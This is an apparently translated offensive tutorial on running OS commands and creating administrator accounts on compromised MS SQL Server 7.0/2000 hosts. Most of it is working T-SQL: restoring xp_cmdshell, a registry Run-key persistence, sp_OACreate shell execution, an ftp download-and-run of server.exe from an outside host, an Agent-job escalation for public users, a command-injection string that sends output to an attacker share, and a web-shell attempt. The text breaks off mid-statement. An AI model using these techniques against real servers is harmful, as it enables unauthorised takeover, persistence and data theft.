Suppose a host has port 1433 open and we have a remote connection to it, either through SQL injection or through a blank or weak sa password.
What can we do to add an administrator account to the system (or to execute any system command)?
1) xp_cmdshell 'cmd.exe /c net user aaa bbb /add'
Everyone knows this one. Its biggest advantage is that you get the command output back. What we fear most is this:
if exists (select * from dbo.sysobjects where id = object_id(N'[dbo].[xp_cmdshell]') and OBJECTPROPERTY(id, N'IsExtendedProc') = 1)
    exec sp_dropextendedproc N'[dbo].[xp_cmdshell]'
The T-SQL above removes the extended stored procedure. Note that it only unregisters the entry in master; the DLL that implements it stays on disk.
We can usually put it back with
SQL 2000:
exec sp_addextendedproc 'xp_cmdshell', 'xplog70.dll'
SQL 7.0:
exec sp_addextendedproc 'xp_cmdshell', 'xpsql70.dll'
(run this in master; a DLL name without a path is resolved from the server's Binn directory) and it is restored.
But some people know that sp_addextendedproc is itself just a stored procedure in master, and it can be dropped too:
drop procedure sp_addextendedproc
if exists (select * from dbo.sysobjects where id = object_id(N'[dbo].[xp_cmdshell]') and OBJECTPROPERTY(id, N'IsExtendedProc') = 1)
    exec sp_dropextendedproc N'[dbo].[xp_cmdshell]'
To restore it, recreate the procedure in master (this is the original system procedure; it is a thin wrapper around DBCC ADDEXTENDEDPROC, which sysadmin can also call directly with the same two arguments):
use master
go
create procedure sp_addextendedproc  -- 1996/08/30 20:13
    @functname nvarchar(517),   /* (owner.)name of function to call */
    @dllname   varchar(255)     /* name of DLL containing function */
as
    set implicit_transactions off
    if @@trancount > 0
    begin
        raiserror(15002, -1, -1, 'sp_addextendedproc')
        return (1)
    end
    /*
    ** Create the extended procedure mapping.
    */
    dbcc addextendedproc(@functname, @dllname)
    return (0)  -- sp_addextendedproc
go
Yes, that was a lot of writing. There is one simple way to protect against all of the above:
first net stop MSSQLServer, then delete xplog70.dll (xpsql70.dll on SQL 7.0) from the Binn directory,
then start the service again. With the DLL gone there is nothing left to re-register. Bear in mind that the same DLL hosts other extended procedures (xp_msver, xp_logevent and friends), so they go with it, and that this only closes xp_cmdshell: none of the methods below need it.
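Before picking one of the methods on this page it helps to know what the target still has. The following audit script is an added example, not code from the original article; it uses the SQL 7.0/2000 system tables, the undocumented master..xp_fileexist and IS_SRVROLEMEMBER(), and the two DLL paths are the default install locations, assumed for this example.

```sql
USE master
GO
-- Added example: find out which of the xp_cmdshell-related pieces survive.
-- DLL paths below are the default install locations (assumptions).
DECLARE @dll varchar(260), @exists int

-- SQL 2000 (8.00) ships xp_cmdshell in xplog70.dll, SQL 7.0 in xpsql70.dll
IF CHARINDEX('8.00', @@VERSION) > 0
    SET @dll = 'C:\Program Files\Microsoft SQL Server\MSSQL\Binn\xplog70.dll'
ELSE
    SET @dll = 'C:\MSSQL7\Binn\xpsql70.dll'

-- 1. is xp_cmdshell still registered? (same test the "delete" snippet uses)
IF EXISTS (SELECT * FROM dbo.sysobjects
           WHERE id = OBJECT_ID(N'[dbo].[xp_cmdshell]')
             AND OBJECTPROPERTY(id, N'IsExtendedProc') = 1)
    PRINT 'xp_cmdshell is registered: method 1 works as is'
ELSE
    PRINT 'xp_cmdshell has been dropped'

-- 2. can we re-register it? sp_addextendedproc may have been dropped as well
IF OBJECT_ID('dbo.sp_addextendedproc') IS NOT NULL
    PRINT 'sp_addextendedproc is present: exec sp_addextendedproc ''xp_cmdshell'', ''' + @dll + ''''
ELSE
    PRINT 'sp_addextendedproc was dropped: recreate it (or call DBCC ADDEXTENDEDPROC directly)'

-- 3. is the DLL still on disk? if not, re-registering only errors on the first call
EXEC master..xp_fileexist @dll, @exists OUTPUT
IF @exists = 1
    PRINT @dll + ' is present'
ELSE
    PRINT @dll + ' is missing: use the registry, sp_OACreate or SQL Agent methods instead'

-- 4. everything in method 1 needs sysadmin; a public login is left with the Agent-job tricks
IF IS_SRVROLEMEMBER('sysadmin') = 1
    PRINT 'caller is sysadmin'
ELSE
    PRINT 'caller is not sysadmin: sp_addextendedproc and DBCC ADDEXTENDEDPROC will be denied'
```

Run it in the same session you got through injection or the weak password; the four PRINT lines tell you whether to proceed with method 1 or skip to 2 through 6.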
2) Having read the above you understand that xp_cmdshell can ultimately be deleted. Is there no other way?
There is. The first is writing to the registry:
xp_regwrite 'HKEY_LOCAL_MACHINE', 'SOFTWARE\Microsoft\Windows\CurrentVersion\Run', 'czy82', 'REG_SZ', 'net user czy bb /add'
In fact there are several places in the registry that will do, such as the browser settings.
The drawback of the registry method is not only that there is no output: the command does not run right away either. A Run value fires at the next interactive logon, under that user's account, so the net user line above only succeeds if the user who logs on is an administrator. I leave the other locations aside.
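Because the registry method gives no output, the one check worth having is a read-back of the value after the write. This is an added example, not from the original article; the value name, the command string and the use of xp_regread/xp_regdeletevalue alongside xp_regwrite are mine, and the assumption is that the SQL Server service account has write access to HKLM.

```sql
USE master
GO
-- Added example: write a Run value, read it back, and (later) remove it.
DECLARE @key varchar(255), @name varchar(64), @value varchar(255), @out varchar(255)
SET @key   = 'SOFTWARE\Microsoft\Windows\CurrentVersion\Run'
SET @name  = 'czy82'                   -- assumed value name
SET @value = 'net user czy bb /add'    -- runs at the next interactive logon

-- xp_regwrite runs under the SQL Server service account; HKLM\...\Run needs
-- administrative rights on the box, so a locked-down service account fails here.
EXEC master..xp_regwrite 'HKEY_LOCAL_MACHINE', @key, @name, 'REG_SZ', @value

-- read it back: @out stays NULL when the value is not there
EXEC master..xp_regread 'HKEY_LOCAL_MACHINE', @key, @name, @out OUTPUT
IF @out = @value
    PRINT 'Run value written; it executes at the next interactive logon'
ELSE
    PRINT 'write failed (no permission on the key, or the value was not created)'

-- after the command has run, or to back out, remove the value again
-- EXEC master..xp_regdeletevalue 'HKEY_LOCAL_MACHINE', @key, @name
```

The read-back is the only "echo" this method has; if it fails, the service account is not an administrator and the remaining methods are the better bet anyway.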
3)
declare @s int
exec sp_oacreate 'WScript.Shell', @s out
--exec sp_OAMethod @s, 'Run', NULL, 'cmd.exe /c echo open Asp.7i24.com > c:\a.txt'
--exec sp_OAMethod @s, 'Run', NULL, 'cmd.exe /c echo 123321 >> c:\a.txt'
--exec sp_OAMethod @s, 'Run', NULL, 'cmd.exe /c echo 123321 >> c:\a.txt'
--exec sp_OAMethod @s, 'Run', NULL, 'cmd.exe /c echo get server.exe >> c:\a.txt'
--exec sp_OAMethod @s, 'Run', NULL, 'cmd.exe /c echo close >> c:\a.txt'
--exec sp_OAMethod @s, 'Run', NULL, 'cmd.exe /c ftp -s:c:\a.txt'
exec sp_OAMethod @s, 'Run', NULL, 'cmd.exe /c server'
(The commented lines build an ftp script, log in, fetch server.exe and feed the script to ftp -s:; uncomment and run them once before the last line runs the download. Strings are single-quoted here: the original used double quotes, which only works while QUOTED_IDENTIFIER is off.)
Yes, as you can see, sp_OACreate and sp_OAMethod can take over the role of xp_cmdshell: they drive the system's COM objects, FSO, WSH, Shell and so on. But there is a problem: unlike xp_cmdshell you don't
see the result right away. Really? Look at the following:
declare @s int, @o int, @f int, @str nvarchar(4000)
/* exec sp_OACreate 'WScript.Shell', @s out
exec sp_OAMethod @s, 'Run', NULL, 'cmd.exe /c net user > c:\temp.txt' */
exec sp_oacreate 'Scripting.FileSystemObject', @o out
exec sp_OAMethod @o, 'OpenTextFile', @f out, 'c:\temp.txt', 1
exec sp_OAMethod @f, 'ReadAll', @str out
print @str
First run the two lines inside the comment, then the rest. The principle is simple: redirect the command output into a file with >, then use
FSO to read it back. Very practical. (The two steps are needed because WScript.Shell.Run returns before the command finishes unless told to wait, so reading immediately can find an empty file; and @str is nvarchar(4000), so longer output is truncated.)
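The same trick as a single batch, added here as an example and not code from the original article: WScript.Shell.Run takes (command, windowStyle, waitOnReturn), and with waitOnReturn = 1 it blocks until cmd.exe exits, so the file is complete before FSO opens it and the two-step run is unnecessary. Every OLE call is checked through its HRESULT, the error text comes from sp_OAGetErrorInfo, and the objects are released with sp_OADestroy. The temp file path is an assumption.

```sql
USE master
GO
-- Added example: run a command, wait for it, read its output through FSO,
-- with error handling and cleanup. c:\temp.txt is an assumed writable path.
DECLARE @sh int, @fso int, @file int, @hr int
DECLARE @cmd varchar(255), @tmp varchar(255), @out nvarchar(4000)
DECLARE @src nvarchar(255), @desc nvarchar(255)
SET @tmp = 'c:\temp.txt'
SET @cmd = 'cmd.exe /c net user > ' + @tmp

EXEC @hr = sp_OACreate 'WScript.Shell', @sh OUTPUT
IF @hr <> 0 GOTO fail
-- Run(command, windowStyle, waitOnReturn): 0 = hidden window, 1 = block until exit
EXEC @hr = sp_OAMethod @sh, 'Run', NULL, @cmd, 0, 1
IF @hr <> 0 GOTO fail

EXEC @hr = sp_OACreate 'Scripting.FileSystemObject', @fso OUTPUT
IF @hr <> 0 GOTO fail
EXEC @hr = sp_OAMethod @fso, 'OpenTextFile', @file OUTPUT, @tmp, 1   -- 1 = ForReading
IF @hr <> 0 GOTO fail
EXEC @hr = sp_OAMethod @file, 'ReadAll', @out OUTPUT   -- nvarchar(4000): longer output is cut
IF @hr <> 0 GOTO fail
PRINT @out

EXEC sp_OAMethod @file, 'Close'
EXEC sp_OAMethod @fso, 'DeleteFile', NULL, @tmp        -- leave no temp file behind
GOTO done

fail:
    -- NULL object token = error information of the most recent OLE call
    EXEC sp_OAGetErrorInfo NULL, @src OUTPUT, @desc OUTPUT
    PRINT 'OLE call failed, hr=' + CONVERT(varchar(12), @hr) + ' ' + ISNULL(@src, '') + ': ' + ISNULL(@desc, '')
done:
    IF @file IS NOT NULL EXEC sp_OADestroy @file
    IF @fso  IS NOT NULL EXEC sp_OADestroy @fso
    IF @sh   IS NOT NULL EXEC sp_OADestroy @sh
```

The sp_OA* procedures are restricted to sysadmin by default, so this is a sysadmin-only substitute for xp_cmdshell; the HRESULT check is what tells you whether the OLE Automation procedures have been disabled or the object could not be created, rather than silently printing an empty @out.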
4)
use msdb  -- not master here
exec sp_add_job @job_name = 'czy82'
exec sp_add_jobstep @job_name = 'czy82', @step_name = 'exec my sql', @subsystem = 'CmdExec', @command = 'dir c:\ > c:\b.txt'
exec sp_add_jobserver @job_name = 'czy82', @server_name = 'smscomputer'
exec sp_start_job @job_name = 'czy82'
SQL Server Agent jobs can also execute commands, and if the @subsystem above is 'TSQL' instead of 'CmdExec', we can
execute T-SQL statements.
Two things to note about these procedures. First, in @server_name you must give your own SQL Server's name ('smscomputer' above is the test machine; '(local)' or @@SERVERNAME also works).
Second, the SQLServerAgent service must be running, and it is not started by default (annoying):
net start SQLServerAgent
There is one more thing about this gadget: public users can use it too. And there is a system hole here as well; look at the following.
use msdb
exec sp_add_job @job_name = 'GetSystemOnSQL',
    @enabled = 1,
    @description = 'This will give a low privileged user access to xp_cmdshell',
    @delete_level = 1
exec sp_add_jobstep @job_name = 'GetSystemOnSQL',
    @step_name = 'Exec my sql',
    @subsystem = 'TSQL',
    @command = 'exec master..xp_execresultset N''select ''''exec master..xp_cmdshell "dir > c:\agent-job-results.txt"'''''', N''master'''
exec sp_add_jobserver @job_name = 'GetSystemOnSQL',
    @server_name = 'Your SQL Server name'
exec sp_start_job @job_name = 'GetSystemOnSQL'
Do not doubt the code above: I tested it successfully. The thing to pay attention to is xp_execresultset. It runs the query it is given and then executes every row of the result set as a T-SQL statement; here the single row is a call to xp_cmdshell, and because the job step runs in the Agent's context rather than the job creator's, it goes through.
That is how a public user ends up executing xp_cmdshell. This was a SQL Server 2000 bug at the time of writing; Microsoft fixed it in later patches.
5) About the Microsoft SQL Agent jobs arbitrary file create/overwrite vulnerability (public users can use it too)
There is an article about it on xfocus: http://www.xfocus.net/vuln/vul_view.PHP?vul_id=2968
use msdb
exec sp_add_job @job_name = 'ArbitraryFileCreate',
    @enabled = 1,
    @description = 'This will create a file called c:\sqlafc123.txt',
    @delete_level = 1
exec sp_add_jobstep @job_name = 'ArbitraryFileCreate',
    @step_name = 'SQLAFC',
    @subsystem = 'TSQL',
    @command = 'select ''Hello, this file is created by the SQL Agent.''',
    @output_file_name = 'c:\sqlafc123.txt'
exec sp_add_jobserver @job_name = 'ArbitraryFileCreate',
    @server_name = 'server_name'
exec sp_start_job @job_name = 'ArbitraryFileCreate'
If the TSQL subsystem is chosen, the generated file carries a header like this:
Job 'ArbitraryFileCreate' : Step 1, 'SQLAFC' : Began Executing 2003-02-07 18:24:19

----------------------------------------------
Hello, this file is created by the SQL Agent.
(1 row(s) affected)
So for generating files I recommend choosing the CmdExec subsystem instead, where the command writes the file itself and no header gets in the way. Used well, we can write a VBS file carrying an add-admin
command into the Startup directory!
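The full life cycle of a CmdExec job, added here as an example for methods 4 and 5 and not code from the original article: it uses '(local)' as the job server so no machine name has to be known, waits for the step to finish (sp_start_job returns immediately), reads the job history, which is the only output an Agent job gives back, and then deletes the job. The job name, output path and echoed text are assumptions.

```sql
USE msdb
GO
-- Added example: CmdExec job that writes a header-free file, then reports and cleans up.
-- Job name, file path and the echoed text are assumptions.
DECLARE @job sysname, @job_id uniqueidentifier, @i int
SET @job = 'czy82_example'

EXEC sp_add_job @job_name = @job, @enabled = 1,
     @description = 'CmdExec step writing a file without the TSQL-subsystem header',
     @delete_level = 0            -- keep the job until we have read its history

-- CmdExec runs the command line under the SQL Server Agent service account.
-- The command writes the file itself, so the file holds exactly what echo printed.
EXEC sp_add_jobstep @job_name = @job, @step_name = 'write file',
     @subsystem = 'CmdExec',
     @command = 'cmd.exe /c echo Hello, this file is created by a CmdExec step. > c:\sqlafc-cmdexec.txt'

EXEC sp_add_jobserver @job_name = @job, @server_name = '(local)'
SELECT @job_id = job_id FROM msdb.dbo.sysjobs WHERE name = @job
EXEC sp_start_job @job_name = @job

-- The job outcome row (step_id = 0) appears in sysjobhistory once the job has
-- finished. Poll for it, up to 30 seconds.
SET @i = 0
WHILE @i < 30 AND NOT EXISTS (SELECT * FROM msdb.dbo.sysjobhistory
                              WHERE job_id = @job_id AND step_id = 0)
BEGIN
    WAITFOR DELAY '00:00:01'
    SET @i = @i + 1
END

-- run_status: 1 = succeeded, 0 = failed; message is the Agent's own text
SELECT step_id, step_name, run_status, message
FROM msdb.dbo.sysjobhistory
WHERE job_id = @job_id
ORDER BY instance_id

EXEC sp_delete_job @job_name = @job
```

If the history never shows a step_id = 0 row within the timeout, the SQLServerAgent service is almost certainly not running; if the step row says run_status 0, the message column carries the reason (typically the Agent account not being allowed to write the target path).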
6) About sp_makewebtask (it can write a file with arbitrary content under an arbitrary file name)
And about sp_MScopyscriptfile, look at the following example:
declare @command varchar(100)
declare @scripfile varchar(200)
set concat_null_yields_null off
select @command = 'dir c:\ > \\AttackerIP\share\dir.txt'
select @scripfile = 'c:\autoexec.bat" > nul | ' + @command + ' | rd "'
exec sp_MScopyscriptfile @scripfile, ''
(The idea is that the procedure passes its first argument to the shell inside double quotes; the string above closes that quote and chains our command in with |, and the trailing rd " swallows the quote the procedure appends.)
Both of these are still being tested.
Letting an MSSQL public user get a web shell on the box :)
sp_makewebtask @outputfile = 'd:\smsa.asp', @charset = gb2312,
--@query = 'SELECT '''
--@query = 'SELECT '''
@query = 'SELECT '
method="POST">